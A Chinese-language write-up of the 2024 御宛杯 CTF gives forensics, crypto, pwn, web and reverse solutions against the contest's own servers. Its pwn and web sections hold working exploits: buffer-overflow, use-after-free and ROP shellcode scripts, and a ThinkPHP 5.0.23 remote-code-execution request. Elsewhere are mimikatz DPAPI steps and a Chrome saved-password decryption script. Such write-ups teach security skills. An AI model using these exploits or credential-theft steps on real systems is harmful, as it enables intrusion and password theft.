2024 御宛杯 WriteUp

Forensics

重生之我是一名警察

┌──(kali㉿kali)-[~/Desktop/volatility-master]
└─$ sha256sum windows7disk.E01 
e0d680e535d8260ee1f32bdc7ea8253bff6f6ea365fafb60a996749583dbbdec  windows7disk.E01

flag：e0d680e535d8260ee1f32bdc7ea8253bff6f6ea365fafb60a996749583dbbdec

task1

通过Autopsy可以加载和分析 .E01 文件

flag：WIN-49I0SNRJAMF

task2

在C:/Program Files (x86)/Nox路径找到夜神模拟器，安装时间：2021-05-03

nox

flag：夜神模拟器2021年05月03日

task3

在注册表路径 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI 中的 LastLoggedOnUser 键值得到最后登录用户用户名

LastLoggedOnUser

flag：poiuy

task4

在注册表路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion中的InstallDate键值得到

InstallDate

InstallDate	REG_DWORD	0x608fd40c (1620038668)

将UNIX时间戳转换后即为操作系统安装日期：2021-05-03 18:44:28

flag：2021-05-03 18:44:28

task5

在路径C:/Users/poiuy/Documents/得到Bitlocker加密的虚拟磁盘文件my.vhd和my1.vhd

flag：my.vhd/my1.vhd

task6

同task4，CurrentVersion键值即为操作系统版本号

CurrentVersion	REG_SZ	6.1

flag：6.1

task7

mimikatz解密主密钥：

mimikatz # dpapi::masterkey /in:C:\Users\A1\Desktop\5eac26eb-b4cc-49b9-90d0-1c07274e301a /sid:S-1-5-21-435394657-638363951-1066549375-1000 /password:09876543
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {5eac26eb-b4cc-49b9-90d0-1c07274e301a}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 9fc1803c3a7a9281a30fdc0e3e3d50a9
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 9076e1cf7033643553818deecadaafbf689ceddb2c082ca01f9acb06195152d06316fd2bbc5fea3bcd3fc94d166957ad2d6bb9fd94658d8696460db05778a8fef87313f19cb3d9a4d2cb688f315289b5ca1f0ef2b610948c7db8c1da9e8cfdfaba6879fe4a485ed30cf7a066a556922c58882d314ef6bf547741bfc45e515c87d71f39f9299bf4c178b8523337fe22ec

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : ddd6b86170410289c16fb878a83cc719
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 248d303dd81e117ac3597aad02c7d2b0aad56e8acad7e350e323f1ffa4fbcc0c62045c57e58e96019317ecc6f5558d03b3da4a64925fa67a57e0994876e50c530c5cff34932492c13097b11a1a44331aeb276fd922cafd30ed537802e686c1275274ec11eaadcdedf4d803f001e2608f

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {e872e171-99e7-47f8-882f-743eda526c2c}



[masterkey] with password: 09876543 (normal user)
  key : 8ec14895e66277e735013b5793f00747faf5e4ca060b6a2715f94ddb8967c2a86a785bd7c690f4f5fc6e17e8481ad229986c99fc2955c469638c88386507163f
  sha1: cd6c4b6f5f8c5d99a127bcd28a9efb17713a8107

解密 DPAPI blob，即 AES 私钥：

mimikatz # dpapi::blob /masterkey:8ec14895e66277e735013b5793f00747faf5e4ca060b6a2715f94ddb8967c2a86a785bd7c690f4f5fc6e17e8481ad229986c99fc2955c469638c88386507163f /in:"C:\Users\admin\Desktop\dec_data" /out:aes.dec
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {5eac26eb-b4cc-49b9-90d0-1c07274e301a}
  dwFlags            : 00000000 - 0 ()
  dwDescriptionLen   : 00000002 - 2
  szDescription      :
  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : 56e7987655d247c884ba7824c8572e30959a7b95b8fcbd1bfbbbe26eb319cf9a
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : cdf3043a77b379336e10fa224971778e2dcac8e5e0100a2b3917f190dbba5e00
  dwDataLen          : 00000030 - 48
  pbData             : 24dc191e5500725448bf99be0e527d8d3975c0a9e7ad58699d72adbff65929a6656794992051f155d024a8038958ed93
  dwSignLen          : 00000040 - 64
  pbSign             : 7403ac411aee180592fed189514c0197fb2583eb113a7314ec7b384397159f92909e8f32ad30944e8f80a329d806e807716286afc6fad65c4d31cdda98ab012f

 * masterkey     : 8ec14895e66277e735013b5793f00747faf5e4ca060b6a2715f94ddb8967c2a86a785bd7c690f4f5fc6e17e8481ad229986c99fc2955c469638c88386507163f
description :
Write to file 'aes.dec' is OK

根据github解密脚本：

import os
import re
import sys
import json
import base64
import sqlite3
import win32crypt
from Cryptodome.Cipher import AES
import shutil
import csv

def get_secret_key():
    secret_key = open('aes.dec', 'rb').read()
    return secret_key

def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)

def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)

def decrypt_password(ciphertext, secret_key):
    try:
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
        return ""

def get_db_connection(chrome_path_login_db):
    try:
        return sqlite3.connect(chrome_path_login_db)
    except Exception as e:
        print("%s"%str(e))
        print("[ERR] Chrome database cannot be found")
        return None

if __name__ == '__main__':
    secret_key = get_secret_key()
    chrome_path_login_db = r"C:\Users\triblade\Desktop\御宛杯\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    conn = get_db_connection(chrome_path_login_db)
    if(secret_key and conn):
        cursor = conn.cursor()
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for index,login in enumerate(cursor.fetchall()):
            url = login[0]
            username = login[1]
            ciphertext = login[2]
            if(url!="" and username!="" and ciphertext!=""):
                decrypted_password = decrypt_password(ciphertext, secret_key)
                print("Sequence: %d"%(index))
                print("URL: %s\nUser Name: %s\nPassword: %s\n"%(url,username,decrypted_password))
                print("*"*50)
        cursor.close()
        conn.close()

得到账号-密码：

Sequence: 0
URL: https://www.baidu.com/
User Name: test
Password: test@test2021.com

**************************************************

flag：https://www.baidu.com/+test+test@test2021.com

task8

size

Size (Bytes) 32212254720

flag：32212254720

task9

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList枚举得到用户“poiuy”的SID为：

S-1-5-21-435394657-638363951-1066549375-1000

flag：S-1-5-21-435394657-638363951-1066549375-1000

task10

Autopsy查找Recent Documents，得到：

BitLocker 恢复密钥 666E6292-906B-4A9B-9167-4DB146123BAD.txt.lnk

BitLocker 恢复密钥 DC6BA222-5699-43EA-A3A0-FFAA4A57E6F7.txt.lnk

经过尝试得到flag

flag：666E6292-906B-4A9B-9167-4DB146123BAD.txt

task11

导出位于C:\Windows\System32\Config\SYSTEM的SYSTEM和SAM文件，通过SAMInside得到NT-hash：7434F2F2B553FBF38B85C25BB4A0E138

在https://cmd5.com/查询NTLM类型得到密码：09876543

flag：09876543

MISC

我敲，黑客

100-1000以内的质数总和：75067

解压得到图片，010editor打开发现图片末尾存在base64编码的图片数据，转换成图片后得到二维码

扫码得到flag：flag{asdf%^&*ghjkl}

List of file signatures

def flip_bytes(input_file, output_file):
    with open(input_file, 'rb') as f:
        data = f.read()

    flipped_data = b''.join([data[i:i+4][::-1] for i in range(0, len(data), 4)])

    with open(output_file, 'wb') as f:
        f.write(flipped_data)

input_file = 'fl4g.jpeg' 
output_file = 'flag.jpeg' 
flip_bytes(input_file, output_file)

flag{byt3_sw4p}

这能执行吗？

程序检测了两个命令行参数USERNAME PASSWORD

在命令提示符中加入命令行参数执行program.exe ALDI 384，得到图片base64编码，转换成图片得到flag:

flag{Arm0uR_pPTi4}

把回忆拼好给你

将两张图片异或

CTF{I_L0V3_PYTH0N}

把回忆拼好给你2.0

拼接图片得到ASCII码：66 6c 61 67 7b 74 68 33 5f 4b 47 42 5f 6c 30 76 33 73 5f 43 54 46 7d

import os
from PIL import Image

input_folder = r".\confetti"
output_file = r".\confetti\a.png"

result = Image.new('RGB', (500, 500))

for i in range(500):
    filename = f"{i}.png"
    filepath = os.path.join(input_folder, filename)

    if os.path.exists(filepath):
        img = Image.open(filepath)

        result.paste(img, (0, i))
    else:
        print(f"Warning: {filename} not found")

result.save(output_file)
print(f"Combined image saved as {output_file}")

对应字符串：flag{th3_KGB_l0v3s_CTF}

不会真有人一个一个解压缩吧？

import os
import subprocess

def extract_zip(zip_file, password, output_dir='.'):
    command = ['7z', 'x', '-p{}'.format(password), zip_file, '-o{}'.format(output_dir), '-y']
    result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    
    if result.returncode == 0:
        print(f"{zip_file} 解压成功!")
        return True
    else:
        print(f"解压 {zip_file} 失败: {result.stderr.decode()}")
        return False

def get_password(password_file):
    with open(password_file, 'r') as f:
        password = f.read().strip()
    return password

def delete_file(file_path):
    try:
        os.remove(file_path)
        print(f"{file_path} 已删除.")
    except OSError as e:
        print(f"无法删除文件 {file_path}: {e}")

def main():
    base_dir = '.'
    current_zip = 'zip-25000.zip'
    password_file = os.path.join(base_dir, 'password.txt')

    for i in range(25000, 0, -1):
        current_zip = f"zip-{i}.zip"
        zip_path = os.path.join(base_dir, current_zip)
        if not os.path.exists(password_file):
            print(f"找不到密码文件: {password_file}")
            break
        
        password = get_password(password_file)
        if not extract_zip(zip_path, password, base_dir):
            break

        password_file = os.path.join(base_dir, 'password.txt')

        if i < 24999:
            previous_zip = f"zip-{i}.zip"
            delete_file(previous_zip)

if __name__ == "__main__":
    main()

TCP1P{1_TH1NK_U_G00D_4T_SCR1PT1N9_botanbell_1s_h3r3^_^}

来签个到吧，包简单的

StegSolve打开图片，在Red plane 0下看到字符串：==QTh9lMx8Fd08VZt9FdFNTb

考虑到Base编码补全规则往往是在末尾补=，于是对字符串进行反转输出，再通过Base64解码得到flag：flag{m3Et_me_4t_12_aM}

这是？配置文件？

https://github.com/HyperSine/how-does-MobaXterm-encrypt-password

python3 MobaXtermCipher.py dec -sp 525710918580 DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL

快来社我_1

百度识图找到景点：云台山

flag{yuntaishan}

快来社我_2

搜索这段文字：这个野兽以 53 个量子比特运行，最近实现了‘量子至上’。我们相信你知道'它'的名字

搜索结果：谷歌10月24日在《自然》杂志150周年纪念特刊上，宣布实现量子计算的“关键里程碑”：最新的拥有53个超导量子比特的 Sycamore 处理器

flag{Sycamore}

快来社我_3

Google Map

Rosenau Bros Kiddie Kloes Historic Factory

362 W Patterson St, Lansford, PA 18232

flag{Carbon_County}

Crypto

Ez_RSA

二元一次方程韦达定理解题

from sympy import symbols, Eq, solve
from Crypto.Util.number import long_to_bytes, inverse

e = 65537
n = 97003850850040952844587475437460149663654189201387855024040346139584151510739356074369121470184325592356345533719425034732087985768855378103846599571920819607004695644591231034028585872350731819641620530992562020648337983877420861817386470051601404728847162770341340709409331924083906577836343671751461800641
not_phi = 97003850850040952844587475437460149663654189201387855024040346139584151510739356074369121470184325592356345533719425034732087985768855378103846599571920879777663593679859238788800713921207765284450610197129070615800306033898076058599156162495376307988618628754841062502962329450466110589828082689175911189124
c = 31648100885161830950110219017754314322263944256316235264449880700096434928815116220641135916147173391572115158841069491300446654777805507405971457255928030870596026057567702034717781270729367309989423695505283185674132049530706799948557972728933012591037486370001542782395573887256404792664989124714420821017

p_plus_q = (not_phi - n - 9)//3

x = symbols('x')
eq1 = Eq(x ** 2 - p_plus_q * x + n, 0)
solutions = solve(eq1)

p = int(solutions[0])
q = int(solutions[1])

assert p * q == n

phi_n = (p - 1) * (q - 1)

d = inverse(e, phi_n)

m = pow(c, d, n)

flag = long_to_bytes(m)
print(flag)

NYSEC{th1s_is_fake_fl4ggg}

babyRSA

当n为质数的时候，φ(n)=n-1

from Crypto.Util.number import long_to_bytes

n = 115637526134331679471762036009650878098192794780919016407992307006285173707815313751816240676624074503522331069738896294029719406044031080434725863244230289442472213042373881987359484483724993562124890872771331854637024940624934390825956979717868136123264909166944848643274757372810254880211270034431901369477
e = 65537
c = 72569468275842451722615052490613164720057228162294356630723330346528174565283712551174610966405323053524552996358664532061010173928966858027707499839481744459379526297316423103302051818874023723931145765517543875769202293737186668733370788763540574136428757287404743954896068847733217295406897120557585899498
phi = n - 1


# 计算d，e的模逆元
def modinv(a, m):
    m0 = m
    x0, x1 = 0, 1
    if m == 1:
        return 1
    while a > 1:
        q = a // m
        m, a = a % m, m
        x0, x1 = x1 - q * x0, x0
    return x1 + m0 if x1 < 0 else x1


# 解密m
def decrypt(n, e, c, phi):
    d = modinv(e, phi)
    m = pow(c, d, n)
    return long_to_bytes(m)


m = decrypt(n, e, c, phi)

print("Flag:", m.decode())

Pwn

netcat

nc连上即得到shell

flag{57ce957a-dd2d-4b7d-933d-4a76701bfe71}

stack oooooooverflow!!!

from pwn import *
context.log_level = 'debug'
p = remote("nysec.ctf.center",35047)
payload = b"a"*(0x14+0x4) + p32(0x804846B)
p.sendline(payload)
sleep(2)
p.sendline(b"cat${IFS}flag")
p.interactive()

flag{e0837ec8-6470-4697-83a6-f4bdafc437fb[TEAM_HASH]}

不要动我的笔记！！！

版本2.23-0ubuntu11.3_i386

更换ld:

patchelf --set-interpreter ./ld-2.23.so ./note

更换libc:

patchelf --replace-needed libc.so.6 ./libc-2.23.so ./note

UAF：

from pwn import *

context.update(arch='i386', os='linux', log_level='debug')
p = remote("nysec.ctf.center", 35491)


def Add(size, content):
    p.sendlineafter(b"Your choice :", str(1))
    p.sendlineafter(b'Note size :', str(size))
    p.sendlineafter(b'Content :', content)


def Delete(idx):
    p.sendlineafter(b"Your choice :", str(2))
    p.sendlineafter(b'Index :', str(idx))


def Print(idx):
    p.sendlineafter(b"Your choice :", str(3))
    p.sendlineafter(b'Index :', str(idx))


magic = 0x00000000080488E2

Add(32, b"aaaa")
Add(32, b"aabb")
Delete(0)
Delete(1)
Add(8, p32(magic))
Print(0)

sleep(2)
p.sendline(b"cat${IFS}flag")

p.interactive()

flag{75c76361-fa50-4c1c-9f32-028e29f14905}

1por

静态编译程序，ROPgadget生成ropchain

from pwn import *

context.update(arch='i386', os='linux', log_level='debug')

r = remote("nysec.ctf.center", 35492)

p = b'a' * (0x88 + 0x4)

# ROPgadget --binary ./rop1 --ropchain
p += p32(0x080551ca)  # pop edx ; ret
p += p32(0x080ef060)  # @ .data
p += p32(0x080c28c6)  # pop eax ; ret
p += b'/bin'
p += p32(0x0808ee3d)  # mov dword ptr [edx], eax ; ret
p += p32(0x080551ca)  # pop edx ; ret
p += p32(0x080ef064)  # @ .data + 4
p += p32(0x080c28c6)  # pop eax ; ret
p += b'//sh'
p += p32(0x0808ee3d)  # mov dword ptr [edx], eax ; ret
p += p32(0x080551ca)  # pop edx ; ret
p += p32(0x080ef068)  # @ .data + 8
p += p32(0x080512c0)  # xor eax, eax ; ret
p += p32(0x0808ee3d)  # mov dword ptr [edx], eax ; ret
p += p32(0x080481ec)  # pop ebx ; ret
p += p32(0x080ef060)  # @ .data
p += p32(0x080e3c2a)  # pop ecx ; ret
p += p32(0x080ef068)  # @ .data + 8
p += p32(0x080551ca)  # pop edx ; ret
p += p32(0x080ef068)  # @ .data + 8
p += p32(0x080512c0)  # xor eax, eax ; ret

for _ in range(11):
    p += p32(0x0809a93f)  # inc eax ; ret

p += p32(0x08049449)  # int 0x80

r.sendline(p)

sleep(2)
r.sendline(b"cat${IFS}flag")

r.interactive()

Web

来签个到吧~~

http://nysec.ctf.center:35043/?id=aGVuYW4=

<?php
error_reporting(0);
highlight_file(__FILE__);
if (!($_REQUEST["id"] == base64_encode("henan"))) {
    goto lklsgyy;
}
echo getenv("GZCTF_FLAG");
lklsgyy:

包简单，一把梭

先尝试目录枚举

F:\gobuster_Windows_x86_64>gobuster.exe dir -u http://nysec.ctf.center:34405/ -w F:\gobuster_Windows_x86_64\Burp_Dir.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://nysec.ctf.center:34405/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                F:\gobuster_Windows_x86_64\Burp_Dir.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/0                    (Status: 200) [Size: 931]
/captcha              (Status: 500) [Size: 7332]
/Index                (Status: 200) [Size: 931]
/Login                (Status: 200) [Size: 880]
/register             (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 284]
/static               (Status: 301) [Size: 330] [--> http://nysec.ctf.center:34405/static/]
Progress: 2140 / 2140 (100.00%)
===============================================================
Finished
===============================================================

路径http://nysec.ctf.center:34405/captcha泄露框架信息

<body>
    <div class="echo">
            </div>
        <div class="exception">
        
            <div class="info"><h1>页面错误！请稍后再试～</h1></div>
        
    </div>
        
    
    
    <div class="copyright">
        <a title="官方网站" href="http://www.thinkphp.cn">ThinkPHP</a> 
        <span>V5.0.23</span> 
        <span>{ 十年磨一剑-为API开发设计的高性能框架 }</span>
    </div>
    

</body>

Thinkphp5.0.23远程代码执行漏洞

POST /Index?s=captcha HTTP/1.1
Host: nysec.ctf.center:34405
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Cookie: GZCTF_Token=CfDJ8Fkqyttp2-JJrGVHVK4HFlkRcTezmAtobSBt7OmrjE-xVkZpRzFV-12CH6NuAaKJW8Pc97sjKEZ7hZgCWS9N9u7mtX9D0Svt0PwtMhq5PVR1i3BnsW8jsET2H2NAAqgP1OnIjshQCiCG9X9ebuj5hKGtXkXfklqfwhjIdUAPDdkpcLzq1S8D40PXlZy3Ns4wv4-yn9uw0fPRwcUsZeIHxKb6aGAfho5f2wVg4KceNlq-GBUF6zmk-txgycioornMoN_9BRfiSlUExQdBpwSjilTvMZiUwp967PEVNxCMCAqjOoybhJZTSd__s9bwsMWwjaJIM7Qr-kAhcE-wETn64AGUXnKxQonQ8jljNT0WAWTJzqGWdzQLi7ADtYLd8BBT37ikTIyZ_HecBIV32lsZJYbBMB2aBoAC6thMv7czM1LUPOXeKXn93zbsIxRt-z0jMsxu_WsXajqMjRLiOnzY3y6fDbPZMMIomMe23GijcAUEU4mc2ibFRemARlGzDWjaHZN8xdCIaxgLiSV1HzU8wvl3t1A_5fa08nzXgan4mUUEikmc5w9vdWIJH5974CiGU5bo83ukzWtiBnT_2L7Z3d3qscipEap8bajHo0SZtSu9YOMVNaPdctArDHDhL80kqrk4xu9oFTE_-l5Tk6JTn38EPvL4OHxvVYEIqBj60kl4TeFL1ZoJjcMGfN1iuraiSHBho-jK0ApHDdppJF3FKFK6rn3OdyCkIVUqpeTt0wUy

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat${IFS}/flag.txt

flag{54a41a77-13c5-4896-92cb-8d04aa58c32b}

哎哟你干嘛~~

浏览器console执行脚本：

H1 = 99999998;  // 将 H1 设为 99999998
c(); 

Base64解码得到flag：NYSEC{ac24adc5685ff-f6402e80bc-6fb6ae59-62aa6666}

貌似露了点什么？！

扫描到文件www.zip，解压后得到flag

F:\gobuster_Windows_x86_64>gobuster.exe dir -u http://nysec.ctf.center:32994/ -w F:\gobuster_Windows_x86_64\vulns.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://nysec.ctf.center:32994/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                F:\gobuster_Windows_x86_64\vulns.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/www.zip              (Status: 200) [Size: 554]
/.htaccess            (Status: 403) [Size: 284]
Progress: 200 / 201 (99.50%)
===============================================================
Finished
===============================================================

flag{53f1fb40-090d-4f30-9e7c-26f93dc2774f}

记得匿名哟~

参考2024红明谷ezphp

考察了php匿名类的用法

class名为: 'class@anonymous'+chr(0)+php文件路径+行数$列数

http://nysec.ctf.center:34466/?class=class@anonymous%00/var/www/html/index.php:4$0

flag{19e96a47-51be-4985-afc2-5d09f497c900}

玩会小游戏吧

浏览器console执行 Runner.instance_.setSpeed(2147483647)

得到 ZmxhZ3s3ZjRmOGIwMC0yNjYyLTRhMTMtYTkyZi1mYTk3NjJjOTA5Y2F9Cg==

解码得到flag：flag{7f4f8b00-2662-4a13-a92f-fa9762c909ca}

Reverse

base

函数aron对Base64的码表进行处理，动态调试得到处理后的码表ACDEFGHIJKLMNOPQRSTUVWXYZZabcdefghijklmnopqrstuvwxyz0123456789+/

__int64 __fastcall aron(__int64 a1)
{
  __int64 result; // rax
  int i; // [rsp+Ch] [rbp-4h]

  if ( a1 )
  {
    for ( i = 0; ; ++i )
    {
      result = *(unsigned __int8 *)(i + a1);
      if ( !(_BYTE)result )
        break;
      if ( *(char *)(i + a1) > 'A' && *(char *)(i + a1) <= 'Y' )
        ++*(_BYTE *)(i + a1);
    }
  }
  return result;
}

flag：NYSEC{Where_Did_U_Go}

我不会逻辑运算

十进制转十六进制，再将十六进制转ASCII码得到flag

def int_to_ascii(values):
    hex_str = ''.join('{:08x}'.format(value) for value in values)
    ascii_str = bytearray.fromhex(hex_str).decode()
    return ascii_str

values = [
    1096770097, 1952395366, 1600270708, 1601398833,
    1716808014, 1734305335, 962749284, 828584245
]

password = int_to_ascii(values)
formatted_password = f"NYSEC{{{password}}}"
print(f"flag: {formatted_password}")

flag: NYSEC{A_b1t_0f_b1t_sh1fTiNg_f79bcd1c15}